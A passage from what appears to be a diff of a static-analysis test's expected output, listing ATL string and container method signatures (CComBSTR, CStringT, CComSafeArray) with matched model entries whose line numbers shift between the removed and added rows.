(wchar_t,int) | CStringT | CStringT | 1 | -| atl.cpp:427:11:427:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | Add | 0 | -| atl.cpp:427:11:427:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | -| atl.cpp:427:11:427:21 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | -| atl.cpp:429:8:429:13 | Attach | (wchar_t *) | CStringT | CStringT | 0 | -| atl.cpp:439:8:439:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 0 | -| atl.cpp:439:8:439:17 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 1 | -| atl.cpp:440:8:440:17 | LoadString | (UINT) | CComBSTR | LoadString | 0 | -| atl.cpp:440:8:440:17 | LoadString | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:448:13:448:22 | operator+= | (const CComBSTR &) | CComBSTR | Append | 0 | -| atl.cpp:448:13:448:22 | operator+= | (const CComBSTR &) | CComBSTR | CComBSTR | 0 | -| atl.cpp:449:13:449:22 | operator+= | (LPCOLESTR) | CComBSTR | Append | 0 | -| atl.cpp:449:13:449:22 | operator+= | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | -| atl.cpp:539:3:539:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | Add | 0 | -| atl.cpp:539:3:539:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | -| atl.cpp:539:3:539:15 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | -| atl.cpp:543:11:543:13 | Add | (const SAFEARRAY *) | CComSafeArray | Add | 0 | -| atl.cpp:543:11:543:13 | Add | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | -| atl.cpp:543:11:543:13 | Add | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | -| atl.cpp:545:11:545:13 | Add | (const T &,BOOL) | CComSafeArray | Add | 0 | -| atl.cpp:545:11:545:13 | Add | (const T &,BOOL) | CComSafeArray | Add | 1 | -| atl.cpp:611:3:611:8 | CPathT | (PCXSTR) | | operator+= | 0 | -| atl.cpp:611:3:611:8 | CPathT | (PCXSTR) | CSimpleStringT | operator+= | 0 | -| atl.cpp:611:3:611:8 | CPathT | (PCXSTR) | CStringT | operator= | 0 | -| atl.cpp:616:8:616:19 | AddExtension | (PCXSTR) | | operator+= | 0 | -| atl.cpp:616:8:616:19 | AddExtension | (PCXSTR) | CSimpleStringT | operator+= | 0 | -| atl.cpp:616:8:616:19 | AddExtension | (PCXSTR) | CStringT | operator= | 0 | -| atl.cpp:617:8:617:13 | Append | (PCXSTR) | | operator+= | 0 | -| atl.cpp:617:8:617:13 | Append | (PCXSTR) | CSimpleStringT | operator+= | 0 | -| atl.cpp:617:8:617:13 | Append | (PCXSTR) | CStringT | operator= | 0 | -| atl.cpp:620:8:620:14 | Combine | (PCXSTR,PCXSTR) | CStringT | Replace | 0 | -| atl.cpp:620:8:620:14 | Combine | (PCXSTR,PCXSTR) | CStringT | Replace | 1 | -| atl.cpp:620:8:620:14 | Combine | (const CStringT &,PCXSTR) | | operator+ | 1 | -| atl.cpp:620:8:620:14 | Combine | (int,PCXSTR) | CStringT | Insert | 1 | -| atl.cpp:621:22:621:33 | CommonPrefix | (PCXSTR) | | operator+= | 0 | -| atl.cpp:621:22:621:33 | CommonPrefix | (PCXSTR) | CSimpleStringT | operator+= | 0 | -| atl.cpp:621:22:621:33 | CommonPrefix | (PCXSTR) | CStringT | operator= | 0 | -| atl.cpp:658:23:658:32 | operator+= | (PCXSTR) | | operator+= | 0 | -| atl.cpp:658:23:658:32 | operator+= | (PCXSTR) | CSimpleStringT | operator+= | 0 | -| atl.cpp:658:23:658:32 | operator+= | (PCXSTR) | CStringT | operator= | 0 | -| atl.cpp:764:8:764:10 | Add | (const deque &,const Allocator &) | deque | deque | 1 | -| atl.cpp:764:8:764:10 | Add | (const forward_list &,const Allocator &) | forward_list | forward_list | 1 | -| atl.cpp:764:8:764:10 | Add | (const list &,const Allocator &) | list | list | 1 | -| atl.cpp:764:8:764:10 | Add | (const vector &,const Allocator &) | vector | vector | 1 | -| atl.cpp:764:8:764:10 | Add | (deque &&,const Allocator &) | deque | deque | 1 | -| atl.cpp:764:8:764:10 | Add | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | -| atl.cpp:764:8:764:10 | Add | (list &&,const Allocator &) | list | list | 1 | -| atl.cpp:764:8:764:10 | Add | (vector &&,const Allocator &) | vector | vector | 1 | -| atl.cpp:775:8:775:12 | SetAt | (const deque &,const Allocator &) | deque | deque | 1 | -| atl.cpp:775:8:775:12 | SetAt | (const forward_list &,const Allocator &) | forward_list | forward_list | 1 | -| atl.cpp:775:8:775:12 | SetAt | (const list &,const Allocator &) | list | list | 1 | -| atl.cpp:775:8:775:12 | SetAt | (const vector &,const Allocator &) | vector | vector | 1 | -| atl.cpp:775:8:775:12 | SetAt | (deque &&,const Allocator &) | deque | deque | 1 | -| atl.cpp:775:8:775:12 | SetAt | (forward_list &&,const Allocator &) | forward_list | forward_list | 1 | -| atl.cpp:775:8:775:12 | SetAt | (list &&,const Allocator &) | list | list | 1 | -| atl.cpp:775:8:775:12 | SetAt | (vector &&,const Allocator &) | vector | vector | 1 | -| atl.cpp:776:8:776:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | deque | deque | 2 | -| atl.cpp:776:8:776:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | forward_list | forward_list | 2 | -| atl.cpp:776:8:776:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | list | list | 2 | -| atl.cpp:776:8:776:17 | SetAtIndex | (InputIterator,InputIterator,const Allocator &) | vector | vector | 2 | -| atl.cpp:776:8:776:17 | SetAtIndex | (size_type,const T &,const Allocator &) | deque | deque | 1 | -| atl.cpp:776:8:776:17 | SetAtIndex | (size_type,const T &,const Allocator &) | deque | deque | 2 | -| atl.cpp:776:8:776:17 | SetAtIndex | (size_type,const T &,const Allocator &) | forward_list | forward_list | 1 | -| atl.cpp:776:8:776:17 | SetAtIndex | (size_type,const T &,const Allocator &) | forward_list | forward_list | 2 | -| atl.cpp:776:8:776:17 | SetAtIndex | (size_type,const T &,const Allocator &) | list | list | 1 | -| atl.cpp:776:8:776:17 | SetAtIndex | (size_type,const T &,const Allocator &) | list | list | 2 | -| atl.cpp:776:8:776:17 | SetAtIndex | (size_type,const T &,const Allocator &) | vector | vector | 1 | -| atl.cpp:776:8:776:17 | SetAtIndex | (size_type,const T &,const Allocator &) | vector | vector | 2 | -| atl.cpp:841:15:841:26 | SetExtraInfo | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:842:15:842:25 | SetHostName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:843:15:843:25 | SetPassword | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:846:15:846:27 | SetSchemeName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:847:15:847:24 | SetUrlPath | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:848:15:848:25 | SetUserName | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:914:3:914:16 | CSimpleStringT | (const XCHAR *,int,IAtlStringMgr *) | CSimpleStringT | CSimpleStringT | 0 | -| atl.cpp:914:3:914:16 | CSimpleStringT | (const XCHAR *,int,IAtlStringMgr *) | CSimpleStringT | CSimpleStringT | 1 | -| atl.cpp:914:3:914:16 | CSimpleStringT | (const XCHAR *,int,IAtlStringMgr *) | CSimpleStringT | CSimpleStringT | 2 | -| atl.cpp:914:3:914:16 | CSimpleStringT | (const YCHAR *,int,IAtlStringMgr *) | CStringT | CStringT | 1 | -| atl.cpp:914:3:914:16 | CSimpleStringT | (const YCHAR *,int,IAtlStringMgr *) | CStringT | CStringT | 2 | -| atl.cpp:915:3:915:16 | CSimpleStringT | (LPCSTR,IAtlStringMgr *) | CStringT | CStringT | 1 | -| atl.cpp:915:3:915:16 | CSimpleStringT | (LPCWSTR,IAtlStringMgr *) | CStringT | CStringT | 1 | -| atl.cpp:915:3:915:16 | CSimpleStringT | (PCXSTR,IAtlStringMgr *) | CSimpleStringT | CSimpleStringT | 0 | -| atl.cpp:915:3:915:16 | CSimpleStringT | (PCXSTR,IAtlStringMgr *) | CSimpleStringT | CSimpleStringT | 1 | -| atl.cpp:915:3:915:16 | CSimpleStringT | (const VARIANT &,IAtlStringMgr *) | CStringT | CStringT | 1 | -| atl.cpp:915:3:915:16 | CSimpleStringT | (const unsigned char *,IAtlStringMgr *) | CStringT | CStringT | 1 | -| atl.cpp:916:3:916:16 | CSimpleStringT | (const CSimpleStringT &) | | operator+= | 0 | -| atl.cpp:916:3:916:16 | CSimpleStringT | (const CSimpleStringT &) | CSimpleStringT | CSimpleStringT | 0 | -| atl.cpp:916:3:916:16 | CSimpleStringT | (const CSimpleStringT &) | CSimpleStringT | operator+= | 0 | -| atl.cpp:916:3:916:16 | CSimpleStringT | (const CSimpleStringT &) | CStringT | CStringT | 0 | -| atl.cpp:916:3:916:16 | CSimpleStringT | (const CSimpleStringT &) | CStringT | operator= | 0 | -| atl.cpp:920:8:920:13 | Append | (const CSimpleStringT &) | | operator+= | 0 | -| atl.cpp:920:8:920:13 | Append | (const CSimpleStringT &) | CSimpleStringT | CSimpleStringT | 0 | -| atl.cpp:920:8:920:13 | Append | (const CSimpleStringT &) | CSimpleStringT | operator+= | 0 | -| atl.cpp:920:8:920:13 | Append | (const CSimpleStringT &) | CStringT | CStringT | 0 | -| atl.cpp:920:8:920:13 | Append | (const CSimpleStringT &) | CStringT | operator= | 0 | -| atl.cpp:921:8:921:13 | Append | (LPCOLESTR,int) | CComBSTR | Append | 1 | -| atl.cpp:921:8:921:13 | Append | (char,int) | CStringT | CStringT | 1 | -| atl.cpp:921:8:921:13 | Append | (const XCHAR *,int) | CStringT | CStringT | 1 | -| atl.cpp:921:8:921:13 | Append | (const YCHAR *,int) | CStringT | CStringT | 1 | -| atl.cpp:921:8:921:13 | Append | (wchar_t,int) | CStringT | CStringT | 1 | -| atl.cpp:922:8:922:13 | Append | (PCXSTR) | | operator+= | 0 | -| atl.cpp:922:8:922:13 | Append | (PCXSTR) | CSimpleStringT | operator+= | 0 | -| atl.cpp:922:8:922:13 | Append | (PCXSTR) | CStringT | operator= | 0 | -| atl.cpp:926:15:926:23 | CopyChars | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyChars | 0 | -| atl.cpp:926:15:926:23 | CopyChars | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyChars | 1 | -| atl.cpp:926:15:926:23 | CopyChars | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyChars | 2 | -| atl.cpp:926:15:926:23 | CopyChars | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyCharsOverlapped | 0 | -| atl.cpp:926:15:926:23 | CopyChars | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyCharsOverlapped | 1 | -| atl.cpp:926:15:926:23 | CopyChars | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyCharsOverlapped | 2 | -| atl.cpp:927:15:927:23 | CopyChars | (XCHAR *,size_t,const XCHAR *,int) | CSimpleStringT | CopyChars | 0 | -| atl.cpp:927:15:927:23 | CopyChars | (XCHAR *,size_t,const XCHAR *,int) | CSimpleStringT | CopyChars | 1 | -| atl.cpp:927:15:927:23 | CopyChars | (XCHAR *,size_t,const XCHAR *,int) | CSimpleStringT | CopyChars | 2 | -| atl.cpp:927:15:927:23 | CopyChars | (XCHAR *,size_t,const XCHAR *,int) | CSimpleStringT | CopyChars | 3 | -| atl.cpp:928:15:928:33 | CopyCharsOverlapped | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyChars | 0 | -| atl.cpp:928:15:928:33 | CopyCharsOverlapped | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyChars | 1 | -| atl.cpp:928:15:928:33 | CopyCharsOverlapped | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyChars | 2 | -| atl.cpp:928:15:928:33 | CopyCharsOverlapped | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyCharsOverlapped | 0 | -| atl.cpp:928:15:928:33 | CopyCharsOverlapped | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyCharsOverlapped | 1 | -| atl.cpp:928:15:928:33 | CopyCharsOverlapped | (XCHAR *,const XCHAR *,int) | CSimpleStringT | CopyCharsOverlapped | 2 | -| atl.cpp:937:8:937:12 | SetAt | (XCHAR,XCHAR) | CStringT | Replace | 1 | -| atl.cpp:937:8:937:12 | SetAt | (const CStringT &,char) | | operator+ | 1 | -| atl.cpp:937:8:937:12 | SetAt | (int,XCHAR) | CStringT | Insert | 0 | -| atl.cpp:937:8:937:12 | SetAt | (int,XCHAR) | CStringT | Insert | 1 | -| atl.cpp:938:8:938:16 | SetString | (LPCOLESTR,int) | CComBSTR | Append | 1 | -| atl.cpp:938:8:938:16 | SetString | (char,int) | CStringT | CStringT | 1 | -| atl.cpp:938:8:938:16 | SetString | (const XCHAR *,int) | CStringT | CStringT | 1 | -| atl.cpp:938:8:938:16 | SetString | (const YCHAR *,int) | CStringT | CStringT | 1 | -| atl.cpp:938:8:938:16 | SetString | (wchar_t,int) | CStringT | CStringT | 1 | -| atl.cpp:939:8:939:16 | SetString | (PCXSTR) | | operator+= | 0 | -| atl.cpp:939:8:939:16 | SetString | (PCXSTR) | CSimpleStringT | operator+= | 0 | -| atl.cpp:939:8:939:16 | SetString | (PCXSTR) | CStringT | operator= | 0 | -| atl.cpp:1035:3:1035:10 | CStringT | (const VARIANT &) | | operator+= | 0 | -| atl.cpp:1035:3:1035:10 | CStringT | (const VARIANT &) | CStringT | CStringT | 0 | -| atl.cpp:1035:3:1035:10 | CStringT | (const VARIANT &) | CStringT | operator= | 0 | -| atl.cpp:1036:3:1036:10 | CStringT | (LPCSTR,IAtlStringMgr *) | CStringT | CStringT | 1 | -| atl.cpp:1036:3:1036:10 | CStringT | (LPCWSTR,IAtlStringMgr *) | CStringT | CStringT | 1 | -| atl.cpp:1036:3:1036:10 | CStringT | (PCXSTR,IAtlStringMgr *) | CSimpleStringT | CSimpleStringT | 1 | -| atl.cpp:1036:3:1036:10 | CStringT | (const VARIANT &,IAtlStringMgr *) | CStringT | CStringT | 0 | -| atl.cpp:1036:3:1036:10 | CStringT | (const VARIANT &,IAtlStringMgr *) | CStringT | CStringT | 1 | -| atl.cpp:1036:3:1036:10 | CStringT | (const unsigned char *,IAtlStringMgr *) | CStringT | CStringT | 1 | -| atl.cpp:1037:3:1037:10 | CStringT | (const CStringT &) | CStringT | CStringT | 0 | -| atl.cpp:1037:3:1037:10 | CStringT | (const CStringT &) | CStringT | operator= | 0 | -| atl.cpp:1041:3:1041:10 | CStringT | (LPCSTR,IAtlStringMgr *) | CStringT | CStringT | 0 | -| atl.cpp:1041:3:1041:10 | CStringT | (LPCSTR,IAtlStringMgr *) | CStringT | CStringT | 1 | -| atl.cpp:1041:3:1041:10 | CStringT | (LPCWSTR,IAtlStringMgr *) | CStringT | CStringT | 1 | -| atl.cpp:1041:3:1041:10 | CStringT | (PCXSTR,IAtlStringMgr *) | CSimpleStringT | CSimpleStringT | 1 | -| atl.cpp:1041:3:1041:10 | CStringT | (const VARIANT &,IAtlStringMgr *) | CStringT | CStringT | 1 | -| atl.cpp:1041:3:1041:10 | CStringT | (const unsigned char *,IAtlStringMgr *) | CStringT | CStringT | 1 | -| atl.cpp:1042:3:1042:10 | CStringT | (LPCSTR,IAtlStringMgr *) | CStringT | CStringT | 1 | -| atl.cpp:1042:3:1042:10 | CStringT | (LPCWSTR,IAtlStringMgr *) | CStringT | CStringT | 0 | -| atl.cpp:1042:3:1042:10 | CStringT | (LPCWSTR,IAtlStringMgr *) | CStringT | CStringT | 1 | -| atl.cpp:1042:3:1042:10 | CStringT | (PCXSTR,IAtlStringMgr *) | CSimpleStringT | CSimpleStringT | 1 | -| atl.cpp:1042:3:1042:10 | CStringT | (const VARIANT &,IAtlStringMgr *) | CStringT | CStringT | 1 | -| atl.cpp:1042:3:1042:10 | CStringT | (const unsigned char *,IAtlStringMgr *) | CStringT | CStringT | 1 | -| atl.cpp:1044:3:1044:10 | CStringT | (char *) | CStringT | CStringT | 0 | -| atl.cpp:1045:3:1045:10 | CStringT | (unsigned char *) | CStringT | CStringT | 0 | -| atl.cpp:1046:3:1046:10 | CStringT | (wchar_t *) | CStringT | CStringT | 0 | -| atl.cpp:1048:3:1048:10 | CStringT | (LPCOLESTR,int) | CComBSTR | Append | 1 | -| atl.cpp:1048:3:1048:10 | CStringT | (char,int) | CStringT | CStringT | 0 | -| atl.cpp:1048:3:1048:10 | CStringT | (char,int) | CStringT | CStringT | 1 | -| atl.cpp:1048:3:1048:10 | CStringT | (const XCHAR *,int) | CStringT | CStringT | 1 | -| atl.cpp:1048:3:1048:10 | CStringT | (const YCHAR *,int) | CStringT | CStringT | 1 | -| atl.cpp:1048:3:1048:10 | CStringT | (wchar_t,int) | CStringT | CStringT | 1 | -| atl.cpp:1049:3:1049:10 | CStringT | (LPCOLESTR,int) | CComBSTR | Append | 1 | -| atl.cpp:1049:3:1049:10 | CStringT | (char,int) | CStringT | CStringT | 1 | -| atl.cpp:1049:3:1049:10 | CStringT | (const XCHAR *,int) | CStringT | CStringT | 1 | -| atl.cpp:1049:3:1049:10 | CStringT | (const YCHAR *,int) | CStringT | CStringT | 1 | -| atl.cpp:1049:3:1049:10 | CStringT | (wchar_t,int) | CStringT | CStringT | 0 | -| atl.cpp:1049:3:1049:10 | CStringT | (wchar_t,int) | CStringT | CStringT | 1 | -| atl.cpp:1060:8:1060:19 | AppendFormat | (PCXSTR,...) | CStringT | AppendFormat | 0 | -| atl.cpp:1060:8:1060:19 | AppendFormat | (PCXSTR,...) | CStringT | AppendFormat | 1 | -| atl.cpp:1060:8:1060:19 | AppendFormat | (PCXSTR,...) | CStringT | Format | 0 | -| atl.cpp:1060:8:1060:19 | AppendFormat | (PCXSTR,...) | CStringT | Format | 1 | -| atl.cpp:1060:8:1060:19 | AppendFormat | (PCXSTR,...) | CStringT | FormatMessage | 0 | -| atl.cpp:1060:8:1060:19 | AppendFormat | (PCXSTR,...) | CStringT | FormatMessage | 1 | -| atl.cpp:1060:8:1060:19 | AppendFormat | (UINT,...) | CStringT | AppendFormat | 1 | -| atl.cpp:1060:8:1060:19 | AppendFormat | (UINT,...) | CStringT | Format | 1 | -| atl.cpp:1060:8:1060:19 | AppendFormat | (UINT,...) | CStringT | FormatMessage | 1 | -| atl.cpp:1061:8:1061:19 | AppendFormat | (PCXSTR,...) | CStringT | AppendFormat | 1 | -| atl.cpp:1061:8:1061:19 | AppendFormat | (PCXSTR,...) | CStringT | Format | 1 | -| atl.cpp:1061:8:1061:19 | AppendFormat | (PCXSTR,...) | CStringT | FormatMessage | 1 | -| atl.cpp:1061:8:1061:19 | AppendFormat | (UINT,...) | CStringT | AppendFormat | 0 | -| atl.cpp:1061:8:1061:19 | AppendFormat | (UINT,...) | CStringT | AppendFormat | 1 | -| atl.cpp:1061:8:1061:19 | AppendFormat | (UINT,...) | CStringT | Format | 0 | -| atl.cpp:1061:8:1061:19 | AppendFormat | (UINT,...) | CStringT | Format | 1 | -| atl.cpp:1061:8:1061:19 | AppendFormat | (UINT,...) | CStringT | FormatMessage | 0 | -| atl.cpp:1061:8:1061:19 | AppendFormat | (UINT,...) | CStringT | FormatMessage | 1 | -| atl.cpp:1069:7:1069:12 | Insert | (PCXSTR,PCXSTR) | CStringT | Replace | 1 | -| atl.cpp:1069:7:1069:12 | Insert | (const CStringT &,PCXSTR) | | operator+ | 1 | -| atl.cpp:1069:7:1069:12 | Insert | (int,PCXSTR) | CStringT | Insert | 0 | -| atl.cpp:1069:7:1069:12 | Insert | (int,PCXSTR) | CStringT | Insert | 1 | -| atl.cpp:1070:7:1070:12 | Insert | (XCHAR,XCHAR) | CStringT | Replace | 1 | -| atl.cpp:1070:7:1070:12 | Insert | (int,XCHAR) | CStringT | Insert | 0 | -| atl.cpp:1070:7:1070:12 | Insert | (int,XCHAR) | CStringT | Insert | 1 | -| atl.cpp:1074:8:1074:17 | LoadString | (UINT) | CComBSTR | LoadString | 0 | -| atl.cpp:1074:8:1074:17 | LoadString | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | -| atl.cpp:1078:12:1078:14 | Mid | (LPCOLESTR,int) | CComBSTR | Append | 1 | -| atl.cpp:1078:12:1078:14 | Mid | (char,int) | CStringT | CStringT | 1 | -| atl.cpp:1078:12:1078:14 | Mid | (const XCHAR *,int) | CStringT | CStringT | 1 | -| atl.cpp:1078:12:1078:14 | Mid | (const YCHAR *,int) | CStringT | CStringT | 1 | -| atl.cpp:1078:12:1078:14 | Mid | (wchar_t,int) | CStringT | CStringT | 1 | -| atl.cpp:1080:7:1080:13 | Replace | (PCXSTR,PCXSTR) | CStringT | Replace | 0 | -| atl.cpp:1080:7:1080:13 | Replace | (PCXSTR,PCXSTR) | CStringT | Replace | 1 | -| atl.cpp:1080:7:1080:13 | Replace | (const CStringT &,PCXSTR) | | operator+ | 1 | -| atl.cpp:1080:7:1080:13 | Replace | (int,PCXSTR) | CStringT | Insert | 1 | -| atl.cpp:1081:7:1081:13 | Replace | (XCHAR,XCHAR) | CStringT | Replace | 0 | -| atl.cpp:1081:7:1081:13 | Replace | (XCHAR,XCHAR) | CStringT | Replace | 1 | -| atl.cpp:1081:7:1081:13 | Replace | (int,XCHAR) | CStringT | Insert | 1 | -| atl.cpp:1084:12:1084:24 | SpanExcluding | (PCXSTR) | | operator+= | 0 | -| atl.cpp:1084:12:1084:24 | SpanExcluding | (PCXSTR) | CSimpleStringT | operator+= | 0 | -| atl.cpp:1084:12:1084:24 | SpanExcluding | (PCXSTR) | CStringT | operator= | 0 | -| atl.cpp:1085:12:1085:24 | SpanIncluding | (PCXSTR) | | operator+= | 0 | -| atl.cpp:1085:12:1085:24 | SpanIncluding | (PCXSTR) | CSimpleStringT | operator+= | 0 | -| atl.cpp:1085:12:1085:24 | SpanIncluding | (PCXSTR) | CStringT | operator= | 0 | -| atl.cpp:1087:13:1087:16 | Trim | (XCHAR) | CStringT | operator= | 0 | -| atl.cpp:1088:13:1088:16 | Trim | (PCXSTR) | | operator+= | 0 | -| atl.cpp:1088:13:1088:16 | Trim | (PCXSTR) | CSimpleStringT | operator+= | 0 | -| atl.cpp:1088:13:1088:16 | Trim | (PCXSTR) | CStringT | operator= | 0 | -| atl.cpp:1090:13:1090:20 | TrimLeft | (XCHAR) | CStringT | operator= | 0 | -| atl.cpp:1091:13:1091:20 | TrimLeft | (PCXSTR) | | operator+= | 0 | -| atl.cpp:1091:13:1091:20 | TrimLeft | (PCXSTR) | CSimpleStringT | operator+= | 0 | -| atl.cpp:1091:13:1091:20 | TrimLeft | (PCXSTR) | CStringT | operator= | 0 | -| atl.cpp:1093:13:1093:21 | TrimRight | (XCHAR) | CStringT | operator= | 0 | -| atl.cpp:1094:13:1094:21 | TrimRight | (PCXSTR) | | operator+= | 0 | -| atl.cpp:1094:13:1094:21 | TrimRight | (PCXSTR) | CSimpleStringT | operator+= | 0 | -| atl.cpp:1094:13:1094:21 | TrimRight | (PCXSTR) | CStringT | operator= | 0 | +| atl.cpp:71:5:71:17 | _U_STRINGorID | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:71:5:71:17 | _U_STRINGorID | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:72:5:72:17 | _U_STRINGorID | (LPCTSTR) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:259:5:259:12 | CAtlList | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:259:5:259:12 | CAtlList | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:259:5:259:12 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:259:5:259:12 | CAtlList | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:409:10:409:10 | operator= | (const CComBSTR &) | CComBSTR | Append | 0 | +| atl.cpp:409:10:409:10 | operator= | (const CComBSTR &) | CComBSTR | CComBSTR | 0 | +| atl.cpp:411:5:411:12 | CComBSTR | (const CComBSTR &) | CComBSTR | Append | 0 | +| atl.cpp:411:5:411:12 | CComBSTR | (const CComBSTR &) | CComBSTR | CComBSTR | 0 | +| atl.cpp:413:5:413:12 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:413:5:413:12 | CComBSTR | (int,LPCOLESTR) | CComBSTR | CComBSTR | 1 | +| atl.cpp:414:5:414:12 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:414:5:414:12 | CComBSTR | (int,LPCSTR) | CComBSTR | CComBSTR | 1 | +| atl.cpp:415:5:415:12 | CComBSTR | (LPCOLESTR) | CComBSTR | Append | 0 | +| atl.cpp:415:5:415:12 | CComBSTR | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:416:5:416:12 | CComBSTR | (LPCSTR) | CComBSTR | Append | 0 | +| atl.cpp:416:5:416:12 | CComBSTR | (LPCSTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:417:5:417:12 | CComBSTR | (CComBSTR &&) | CComBSTR | CComBSTR | 0 | +| atl.cpp:420:13:420:18 | Append | (const CComBSTR &) | CComBSTR | Append | 0 | +| atl.cpp:420:13:420:18 | Append | (const CComBSTR &) | CComBSTR | CComBSTR | 0 | +| atl.cpp:421:13:421:18 | Append | (wchar_t) | | operator+= | 0 | +| atl.cpp:421:13:421:18 | Append | (wchar_t) | CComBSTR | Append | 0 | +| atl.cpp:421:13:421:18 | Append | (wchar_t) | CSimpleStringT | operator+= | 0 | +| atl.cpp:422:13:422:18 | Append | (char) | | operator+= | 0 | +| atl.cpp:422:13:422:18 | Append | (char) | CComBSTR | Append | 0 | +| atl.cpp:422:13:422:18 | Append | (char) | CSimpleStringT | operator+= | 0 | +| atl.cpp:423:13:423:18 | Append | (LPCOLESTR) | CComBSTR | Append | 0 | +| atl.cpp:423:13:423:18 | Append | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:424:13:424:18 | Append | (LPCSTR) | CComBSTR | Append | 0 | +| atl.cpp:424:13:424:18 | Append | (LPCSTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:425:13:425:18 | Append | (LPCOLESTR,int) | CComBSTR | Append | 0 | +| atl.cpp:425:13:425:18 | Append | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| atl.cpp:425:13:425:18 | Append | (char,int) | CStringT | CStringT | 1 | +| atl.cpp:425:13:425:18 | Append | (const XCHAR *,int) | CStringT | CStringT | 1 | +| atl.cpp:425:13:425:18 | Append | (const YCHAR *,int) | CStringT | CStringT | 1 | +| atl.cpp:425:13:425:18 | Append | (wchar_t,int) | CStringT | CStringT | 1 | +| atl.cpp:426:13:426:22 | AppendBSTR | (wchar_t *) | CStringT | CStringT | 0 | +| atl.cpp:427:13:427:23 | AppendBytes | (LPCOLESTR,int) | CComBSTR | Append | 1 | +| atl.cpp:427:13:427:23 | AppendBytes | (char,int) | CStringT | CStringT | 1 | +| atl.cpp:427:13:427:23 | AppendBytes | (const XCHAR *,int) | CStringT | CStringT | 1 | +| atl.cpp:427:13:427:23 | AppendBytes | (const YCHAR *,int) | CStringT | CStringT | 1 | +| atl.cpp:427:13:427:23 | AppendBytes | (wchar_t,int) | CStringT | CStringT | 1 | +| atl.cpp:428:13:428:23 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | Add | 0 | +| atl.cpp:428:13:428:23 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | +| atl.cpp:428:13:428:23 | ArrayToBSTR | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | +| atl.cpp:430:10:430:15 | Attach | (wchar_t *) | CStringT | CStringT | 0 | +| atl.cpp:440:10:440:19 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:440:10:440:19 | LoadString | (HINSTANCE,UINT) | CComBSTR | LoadString | 1 | +| atl.cpp:441:10:441:19 | LoadString | (UINT) | CComBSTR | LoadString | 0 | +| atl.cpp:441:10:441:19 | LoadString | (UINT) | _U_STRINGorID | _U_STRINGorID | 0 | +| atl.cpp:449:15:449:24 | operator+= | (const CComBSTR &) | CComBSTR | Append | 0 | +| atl.cpp:449:15:449:24 | operator+= | (const CComBSTR &) | CComBSTR | CComBSTR | 0 | +| atl.cpp:450:15:450:24 | operator+= | (LPCOLESTR) | CComBSTR | Append | 0 | +| atl.cpp:450:15:450:24 | operator+= | (LPCOLESTR) | CComBSTR | CComBSTR | 0 | +| atl.cpp:540:5:540:17 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | Add | 0 | +| atl.cpp:540:5:540:17 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | +| atl.cpp:540:5:540:17 | CComSafeArray | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | +| atl.cpp:544:13:544:15 | Add | (const SAFEARRAY *) | CComSafeArray | Add | 0 | +| atl.cpp:544:13:544:15 | Add | (const SAFEARRAY *) | CComSafeArray | CComSafeArray | 0 | +| atl.cpp:544:13:544:15 | Add | (const SAFEARRAY *) | CComSafeArray | operator= | 0 | +| atl.cpp:546:13:546:15 | Add | (const T &,BOOL) | CComSafeArray | 